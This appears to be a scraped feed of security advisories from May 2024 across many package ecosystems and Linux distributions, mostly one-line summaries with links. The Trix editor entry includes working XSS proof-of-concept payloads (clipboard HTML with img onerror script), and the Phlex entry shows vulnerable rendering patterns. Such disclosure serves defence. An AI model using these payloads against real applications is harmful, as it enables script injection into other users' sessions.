02.05.2024 03:00:00	cpan	[CPANSA-Email-MIME-2024-4140] Email-MIME vulnerability (high)	An excessive memory use issue (CWE-770) exists in Email-MIME, before version 1.954, which can cause denial of service when parsing multipart MIME messages. The patch set (from 2020 and 2024) limits excessive depth and the total number of parts.	https://secdb.nttzen.cloud/security-advisory/cpan/CPANSA-Email-MIME-2024-4140
02.05.2024 03:00:00	debian	[DSA-5676-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5676-1
02.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3342] Missing permission check in `git-server` (medium)	`git-server` 114.v068a_c7cc2574 and earlier does not perform a permission check for read access to a Git repository over SSH.This allows attackers with a previously configured SSH public key but lacking Overall/Read permission to access Git repositories.`git-server` 117.veb_68868fa_027 requires Overall/Read permission to access Git repositories over SSH.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3342
02.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3294] Token stored in plain text by `telegram-notifications` (low)	`telegram-notifications` 1.4.0 and earlier stores the Telegram Bot token unencrypted in its global configuration file `jenkinsci.plugins.telegrambot.TelegramBotGlobalConfiguration.xml` on the Jenkins controller as part of its configuration.This token can be viewed by users with access to the Jenkins controller file system.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3294
02.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3331] Security protection disabled by `svn-partial-release-mgr` (medium)	`svn-partial-release-mgr` 1.0.1 and earlier programmatically sets the link:/doc/book/managing/system-properties/#hudson-model-parametersaction-keepundefinedparameters[Java system property `hudson.model.ParametersAction.keepUndefinedParameters`] whenever a build is triggered from a release tag with the 'Svn-Partial Release Manager' SCM.Doing so disables the fix for link:/security/advisory/2016-05-11/#arbitrary-build-parameters-are-passed-to-build-scripts-as-environment-variables[SECURITY-170 / CVE-2016-3721].As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3331
02.05.2024 03:00:00	jenkins	[JENKINS:SECURITY-3341] Multiple sandbox bypass vulnerabilities in `script-security` (high)	`script-security` provides a sandbox feature that allows low privileged users to define scripts, including Pipelines, that are generally safe to execute.Calls to code defined inside a sandboxed script are intercepted, and various allowlists are checked to determine whether the call is to be allowed.Multiple sandbox bypass vulnerabilities exist in `script-security` 1335.vf07d9ce377a_e and earlier:* Crafted constructor bodies that invoke other constructors can be used to construct any subclassable type via implicit casts.* Sandbox-defined Groovy classes that shadow specific non-sandbox-defined classes can be used to construct any subclassable type.These vulnerabilities allow attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.NOTE: These issues are caused by an incomplete fix of link:/security/advisory/2022-10-19/#SECURITY-2824%20(1)[SECURITY-2824].`script-security` 1336.vf33a_a_9863911 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox:* Calls to to other constructors using `this` are now intercepted by the sandbox.* Classes in packages that can be shadowed by Groovy-defined classes are no longer ignored by the sandbox when intercepting super constructor calls.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3341
03.05.2024 20:32:01	npm	[NPM:GHSA-R4Q9-XX5G-J24P] s3-url-parser vulnerable to Denial of Service via regexes component (moderate)	s3-url-parser 1.0.3 is vulnerable to denial of service via the regexes component.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R4Q9-XX5G-J24P
03.05.2024 01:30:29	rubysec	[RUBYSEC:PHLEX-2024-32970] Phlex vulnerable to Cross-site Scripting (XSS) via maliciously formed HTML attribute names and values (high)	There is a potential cross-site scripting (XSS) vulnerability thatcan be exploited via maliciously crafted user data.The reason these issues were not detected before is the escapes wereworking as designed. However, their design didn't take into accountjust how recklessly permissive browser are when it comes to executingunsafe JavaScript via HTML attributes.### ImpactIf you render an `<a>` tag with an `href` attribute set to anuser-provided link, that link could potentially execute JavaScriptwhen clicked by another user.```rubya(href: user_profile) { "Profile" }```If you splat user-provided attributes when rendering any HTML or SVGtag, malicious event attributes could be included in the output,executing JavaScript when the events are triggered by another user.```rubyh1(**JSON.parse(user_attributes))```### PatchesPatches are [available on RubyGems](https://rubygems.org/gems/phlex)for all minor versions released in the last year.- [1.10.2](https://rubygems.org/gems/phlex/versions/1.10.2)- [1.9.3](https://rubygems.org/gems/phlex/versions/1.9.3)If you are on `main`, it has been patched since[`da8f943`](https://github.com/phlex-ruby/phlex/commit/da8f94342a84cff9d78c98bcc3b3604ee2e577d2)### WorkaroundsConfiguring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)would effectively prevent this vulnerability from being exploited.### ReferencesIn addition to upgrading to a patched version of Phlex, we stronglyrecommend configuring a Content Security Policy header that doesnot allow `unsafe-inline`. Here’s how you can configure a ContentSecurity Policy header in Rails.https://guides.rubyonrails.org/security.html#content-security-policy-header	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PHLEX-2024-32970
02.05.2024 03:00:00	freebsd	[FREEBSD:F69415AA-086E-11EF-9F97-A8A1599412C6] chromium -- multiple security fixes	Chrome Releases reports: This update includes 2 security fixes: [335003891] High CVE-2024-4331: Use after free in Picture In Picture. Reported by Zhenghang Xiao (@Kipreyyy) on 2024-04-16 [333508731] High CVE-2024-4368: Use after free in Dawn. Reported by wgslfuzz on 2024-04-09	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:F69415AA-086E-11EF-9F97-A8A1599412C6
02.05.2024 03:00:00	freebsd	[FREEBSD:4A1E2BAD-0836-11EF-9FD2-1C697A616631] R -- arbitrary code execution vulnerability (high)	HiddenLayer Research reports: Deserialization of untrusted data can occur in the R statistical programming language, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user's system.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:4A1E2BAD-0836-11EF-9FD2-1C697A616631
08.05.2024 00:03:41	go	[GO-2024-2824] Malformed DNS message can cause infinite loop in net	A malformed DNS message in response to a query can cause the Lookup functions toget stuck in an infinite loop.	https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2824
07.05.2024 22:36:29	ubuntu	[USN-6767-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6767-1
07.05.2024 22:22:43	ubuntu	[USN-6766-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6766-1
07.05.2024 22:59:42	maven	[MAVEN:GHSA-P343-9QWP-PQXV] Neo4j Cypher component mishandles IMMUTABLE privileges (moderate)	The Cypher component in Neo4j before 5.19.0 mishandles IMMUTABLE privileges.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P343-9QWP-PQXV
07.05.2024 22:59:13	maven	[MAVEN:GHSA-64CM-3CJ3-67HF] MS Basic Cross-site Scripting vulnerability (moderate)	Cross-site scripting (XSS) vulnerability in the search function in MvnRepository MS Basic 2.1.18.3 and earlier.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-64CM-3CJ3-67HF
07.05.2024 20:15:07	alpinelinux	[ALPINE:CVE-2024-27982] nodejs, nodejs-current vulnerability (medium)	[From CVE-2024-27982] The team has identified a critical vulnerability in the http server of the most recent version of Node, where malformed headers can lead to HTTP request smuggling. Specifically, if a space is placed before a content-length header, it is not interpreted correctly, enabling attackers to smuggle in a second request within the body of the first.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-27982
07.05.2024 20:11:00	xen	[XSA-457] Linux/xen-netback: Memory leak due to missing cleanup function	ISSUE DESCRIPTIONIn netback, xennet_alloc_one_rx_buffer() failed to call theappropriate clean-up function, resulting in a memory leak.IMPACTA malicious guest userspace process can exhaust memory resourceswithin the guest kernel, potentially leading to a system crash (Denialof Service). It is not known whether it can be triggered remotely.VULNERABLE SYSTEMSSystems with guests running Linux 5.9 and later with Xen PV networkdevices are affected.	https://secdb.nttzen.cloud/security-advisory/xen/XSA-457
07.05.2024 21:48:11	npm	[NPM:GHSA-QJQP-XR96-CJ99] Trix Editor Arbitrary Code Execution Vulnerability (moderate)	The Trix editor, versions prior to 2.1.1, is vulnerable to arbitrary code execution when copying and pasting content from the web or other documents with markup into the editor. The vulnerability stems from improper sanitization of pasted content, allowing an attacker to embed malicious scripts which are executed within the context of the application.Vulnerable Versions: Up to 2.1.0Fixed Version: 2.1.1Vector:- Bug 1: When copying content manipulated by a script, such as:```jsdocument.addEventListener('copy', function(e){ e.clipboardData.setData('text/html', '<div><noscript><div class="123</noscript>456<img src=1 onerror=alert(1)//"></div></noscript></div>'); e.preventDefault();});```and pasting into the Trix editor, the script within the content is executed.- Bug 2: Similar execution occurs with content structured as:```jsdocument.write(`copy<div data-trix-attachment="{"contentType":"text/html","content":"<img src=1 onerror=alert(101)>HELLO123"}"></div>me`);```### Impact:An attacker could exploit these vulnerabilities to execute arbitrary JavaScript code within the context of the user's session, potentially leading to unauthorized actions being performed or sensitive information being disclosed.### Remediation:Update Recommendation: Users should upgrade to Trix editor version 2.1.1 or later, which incorporates proper sanitization of input from copied content.CSP Enhancement: Additionally, enhancing the Content Security Policy (CSP) to disallow inline scripts can significantly mitigate the risk of such vulnerabilities. Set CSP policies such as script-src 'self' to ensure that only scripts hosted on the same origin are executed, and explicitly prohibit inline scripts using script-src-elem.### References: - https://github.com/basecamp/trix/releases/tag/v2.1.1 - https://github.com/basecamp/trix/pull/1147 - https://github.com/basecamp/trix/pull/1149Credit: These issues were reported by security researchers [loknop](https://hackerone.com/loknop) and [pinpie](https://hackerone.com/pinpie).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJQP-XR96-CJ99
07.05.2024 19:49:01	npm	[NPM:GHSA-87HQ-Q4GP-9WR4] react-pdf vulnerable to arbitrary JavaScript execution upon opening a malicious PDF with PDF.js (high)	### SummaryIf PDF.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.### Patches[This patch](https://github.com/wojtekmaj/react-pdf/commit/671e6eaa2e373e404040c13cc6b668fe39839cad) forces `isEvalSupported` to `false`, removing the attack vector.### WorkaroundsSet `options.isEvalSupported` to `false`, where `options` is `Document` component prop.### References- [GHSA-wgrm-67xf-hhpq](https://github.com/mozilla/pdf.js/security/advisories/GHSA-wgrm-67xf-hhpq)- https://github.com/mozilla/pdf.js/pull/18015- https://github.com/mozilla/pdf.js/commit/85e64b5c16c9aaef738f421733c12911a441cec6- https://bugzilla.mozilla.org/show_bug.cgi?id=1893645	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-87HQ-Q4GP-9WR4
07.05.2024 19:51:11	maven	[MAVEN:GHSA-2X52-8F29-7CJR] Eclipse Dataspace Components vulnerable to OAuth2 client secret disclosure (moderate)	In Eclipse Dataspace Components from version 0.2.1 to 0.6.2, in the [EDC Connector component](https://github.com/eclipse-edc/Connector), an attacker might obtain OAuth2 client secrets from the vault.In Eclipse Dataspace Components from version 0.2.1 to 0.6.2, we have identified a security vulnerability in the EDC Connector component ( https://github.com/eclipse-edc/Connector ) regarding the OAuth2-protected data sink feature. When using a custom, OAuth2-protected data sink, the OAuth2-specific data address properties are resolved by the provider data plane. Problematically, the consumer-provided clientSecretKey, which indicates the OAuth2 client secret to retrieve from a secrets vault, is resolved in the context of the provider's vault, not the consumer. This secret's value is then sent to the tokenUrl, also consumer-controlled, as part of an OAuth2 client credentials grant. The returned access token is then sent as a bearer token to the data sink URL.This feature is now disabled entirely, because not all code paths necessary for a successful realization were fully implemented.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2X52-8F29-7CJR
07.05.2024 18:22:10	ubuntu	[USN-6765-1] Linux kernel (OEM) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6765-1
07.05.2024 17:58:23	ubuntu	[USN-6764-1] libde265 vulnerability	libde265 could be made to crash if it opened a specially craftedfile.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6764-1
07.05.2024 17:44:21	ubuntu	[USN-6754-2] nghttp2 vulnerability (medium)	Several security issues were fixed in nghttp2.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6754-2
07.05.2024 14:21:40	ubuntu	[USN-6763-1] libvirt vulnerability	libvirt could allow unintended access to the virtproxyd service.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6763-1
07.05.2024 13:26:15	npm	[NPM:GHSA-WGRM-67XF-HHPQ] PDF.js vulnerable to arbitrary JavaScript execution upon opening a malicious PDF (high)	### ImpactIf pdf.js is used to load a malicious PDF, and PDF.js is configured with `isEvalSupported` set to `true` (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.### PatchesThe patch removes the use of `eval`:https://github.com/mozilla/pdf.js/pull/18015### WorkaroundsSet the option `isEvalSupported` to `false`. ### Referenceshttps://bugzilla.mozilla.org/show_bug.cgi?id=1893645	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WGRM-67XF-HHPQ
07.05.2024 03:00:00	debian	[DSA-5682-1] glib2.0	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5682-1
07.05.2024 03:00:00	gentoo	[GLSA-202405-18] Xpdf: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in Xpdf, the worst of which could possibly lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-18
07.05.2024 03:00:00	gentoo	[GLSA-202405-19] xar: Unsafe Extraction (normal)	A vulnerability has been discovered in xar, which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-19
07.05.2024 03:00:00	gentoo	[GLSA-202405-20] libjpeg-turbo: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in libjpeg-turbo, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-20
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2549] skopeo security and bug fix update (moderate)	[2:1.14.3-2]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/5f2b9af)- Resolves: RHEL-28736[2:1.14.3-1]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/4a2bc3a)- Resolves: RHEL-28235[2:1.14.3-0.2]- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/d0a0f1a)- Resolves: RHEL-28235	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2549
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2550] buildah bug fix update (moderate)	[1.33.7-1.0.1]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178][2:1.33.7-1]- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/b95e962)- Resolves: RHEL-28230	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2550
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2559] python-jwcrypto security update (moderate)	[0.8-5]- Address potential DoS with high compression ratio Resolves: RHEL-28698	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2559
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2560] libvirt security and bug fix update (moderate)	[10.0.0-6.2.0.1]- Set SOURCE_DATE_EPOCH from changelog [Orabug: 32019554][10.0.0-6.2.el9_4]- qemu: Fix migration with custom XML (RHEL-32654)[10.0.0-6.1.el9_4]- Fix off-by-one error in udevListInterfacesByStatus (CVE-2024-1441, RHEL-25081)- remote: check for negative array lengths before allocation (CVE-2024-2494)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2560
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2564] mod_http2 security update (moderate)	[2.0.26-2]- Resolves: RHEL-31855 - mod_http2: httpd: CONTINUATION frames DoS (CVE-2024-27316)[2.0.26-1]- Resolves: RHEL-14691 - mod_http2 rebase to 2.0.26	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2564
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2565] libreswan security update (moderate)	[4.12-2.0.1]- Add libreswan-oracle.patch to detect Oracle Linux distro[4.12-2]- Fix CVE-2024-2357 (RHEL-32761)- x509: unpack IPv6 general names based on length (RHEL-32718)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2565
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2568] grafana security update (moderate)	[9.2.10-16]- Check OrdID is correct before deleting snapshot- fix CVE-2024-1313- fix CVE-2024-1394	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2568
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2569] grafana-pcp security update (important)	[5.1.1-2]- fix CVE-2024-1394	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2569
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2616] tigervnc security update (important)	[1.13.1-8.3]- Rebuild (z-stream target) Resolves: RHEL-30985 Resolves: RHEL-31015[1.13.1-8.2]- Fix crash caused by fix for CVE-2024-31083 Resolves: RHEL-30985[1.13.1-8.1]- Fix CVE-2024-31080 tigervnc: xorg-x11-server: Heap buffer overread/data leakage in ProcXIGetSelectedEvents Resolves: RHEL-31015- Fix CVE-2024-31083 tigervnc: xorg-x11-server: User-after-free in ProcRenderAddGlyphs Resolves: RHEL-30985	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2616
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2679] libxml2 security update (moderate)	[2.9.13-6]- Fix CVE-2024-25062 (RHEL-29196)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2679
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2724] git-lfs security update (important)	[3.4.1-2]- Rebuild with new Golang- Resolves: RHEL-32570, RHEL-28385, RHEL-28402, RHEL-28432	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2724
07.05.2024 03:00:00	oraclelinux	[ELSA-2024-2548] podman security and bug fix update (moderate)	[4.9.4-3.0.1]- Add devices on container startup, not on creation- Backport fast gzip for compression [Orabug: 36420418]- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404][4:4.9.4-3]- rebuild- Related: RHEL-28234[4:4.9.4-2]- bump Epoch to 4 to preserve upgrade path from rhel 8.10- bump release tag or else it refuses to build- Resolves: RHEL-28234[4:4.9.4-1]- bump Epoch to 4 to preserve upgrade path from rhel 8.10- Resolves: RHEL-28234[3:4.9.4-1]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/7752c56)- Resolves: RHEL-28234[3:4.9.3-3]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/5f872ae)- Resolves: RHEL-28234[3:4.9.3-2]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/06e4598)- Resolves: RHEL-28636[2:4.9.3-1]- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/c82fdc8)- Resolves: RHEL-28633 RHEL-28629	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-2548
06.05.2024 18:40:42	suse	[SUSE-SU-2024:1151-2] Security update for curl (moderate)	Security update for curl	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1151-2
06.05.2024 16:06:52	rockylinux	[RLBA-2024:1732] .NET 6.0 bugfix update (none)	An update is available for dotnet6.0.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1732
06.05.2024 16:06:52	rockylinux	[RLBA-2024:1733] .NET 8.0 bugfix update (none)	An update is available for dotnet8.0.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1733
06.05.2024 16:06:52	rockylinux	[RLBA-2024:1735] .NET 7.0 bugfix update (none)	An update is available for dotnet7.0.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1735
06.05.2024 16:06:52	rockylinux	[RLBA-2024:1757] firefox bug fix update (none)	An update is available for firefox.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1757
06.05.2024 16:06:52	rockylinux	[RLSA-2024:1719] rear security update (moderate)	An update is available for rear.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1719
06.05.2024 16:06:52	rockylinux	[RLSA-2024:1751] unbound security update (important)	An update is available for unbound.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1751
06.05.2024 16:06:52	rockylinux	[RLSA-2024:1781] bind9.16 security update (important)	An update is available for bind9.16.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1781
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1912] firefox security update (important)	An update is available for firefox.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1912
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1818] java-1.8.0-openjdk security update (moderate)	An update is available for java-1.8.0-openjdk.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1818
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1828] java-21-openjdk security update (moderate)	An update is available for java-21-openjdk.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1828
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1939] thunderbird security update (low)	An update is available for thunderbird.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1939
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1822] java-11-openjdk security update (moderate)	An update is available for java-11-openjdk.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1822
06.05.2024 16:06:53	rockylinux	[RLSA-2024:1998] libreswan security update (moderate)	An update is available for libreswan.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1998
06.05.2024 16:06:53	rockylinux	[RLSA-2024:2037] tigervnc security update (important)	An update is available for tigervnc.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:2037
06.05.2024 16:06:51	rockylinux	[RLBA-2024:1739] sos bugfix and enhancement update (none)	An update is available for sos.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:1739
06.05.2024 16:06:52	rockylinux	[RLSA-2024:1782] bind and dhcp security update (important)	An update is available for dhcp, bind.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1782
06.05.2024 16:06:52	rockylinux	[RLSA-2024:1784] gnutls security update (moderate)	An update is available for gnutls.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:1784
06.05.2024 15:56:18	suse	[SUSE-SU-2024:1536-1] Security update for flatpak (important)	Security update for flatpak	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1536-1
06.05.2024 15:56:00	suse	[SUSE-SU-2024:1535-1] Security update for flatpak (important)	Security update for flatpak	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1535-1
06.05.2024 15:55:36	suse	[SUSE-SU-2024:1534-1] Security update for less (important)	Security update for less	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1534-1
06.05.2024 12:55:29	suse	[SUSE-SU-2024:1532-1] Security update for SUSE Manager Server 4.3 (important)	Security update for SUSE Manager Server 4.3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1532-1
06.05.2024 12:52:35	suse	[SUSE-SU-2024:1530-1] Security update for grafana and mybatis (moderate)	Security update for grafana and mybatis	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1530-1
06.05.2024 12:50:25	suse	[SUSE-SU-2024:1525-1] Security update for SUSE Manager Salt Bundle (important)	Security update for SUSE Manager Salt Bundle	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1525-1
06.05.2024 12:49:26	suse	[SUSE-SU-2024:1518-1] Security update for SUSE Manager Salt Bundle (important)	Security update for SUSE Manager Salt Bundle	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1518-1
06.05.2024 12:49:02	suse	[SUSE-SU-2024:1517-1] Security update for SUSE Manager Salt Bundle (important)	Security update for SUSE Manager Salt Bundle	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1517-1
06.05.2024 12:47:44	suse	[SUSE-SU-2024:1509-1] Security update for SUSE Manager Client Tools (important)	Security update for SUSE Manager Client Tools	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1509-1
06.05.2024 12:46:36	suse	[SUSE-SU-2024:1508-1] Security update for SUSE Manager Client Tools (moderate)	Security update for SUSE Manager Client Tools	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1508-1
06.05.2024 12:46:03	suse	[SUSE-SU-2024:1507-1] Security update for SUSE Manager Server 4.3 (important)	Security update for SUSE Manager Server 4.3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1507-1
06.05.2024 12:33:30	suse	[SUSE-SU-2024:1506-1] Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP2) (important)	Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP2)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1506-1
06.05.2024 12:33:25	suse	[SUSE-SU-2024:1505-1] Security update for the Linux Kernel (Live Patch 42 for SLE 12 SP5) (important)	Security update for the Linux Kernel (Live Patch 42 for SLE 12 SP5)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1505-1
06.05.2024 11:58:33	suse	[SUSE-SU-2024:1500-1] Security update for avahi (moderate)	Security update for avahi	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1500-1
06.05.2024 10:44:57	suse	[SUSE-SU-2024:1499-1] Security update for java-17-openjdk (low)	Security update for java-17-openjdk	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1499-1
06.05.2024 10:42:13	suse	[SUSE-SU-2024:1498-1] Security update for java-11-openjdk (low)	Security update for java-11-openjdk	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1498-1
06.05.2024 10:40:10	suse	[SUSE-SU-2024:1497-1] Security update for skopeo (important)	Security update for skopeo	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:1497-1
06.05.2024 03:00:00	debian	[DSA-5681-1] linux (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5681-1
06.05.2024 03:00:00	debian	[DSA-5680-1] linux (medium)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5680-1
06.05.2024 03:00:00	gentoo	[GLSA-202405-17] glibc: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in glibc, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202405-17
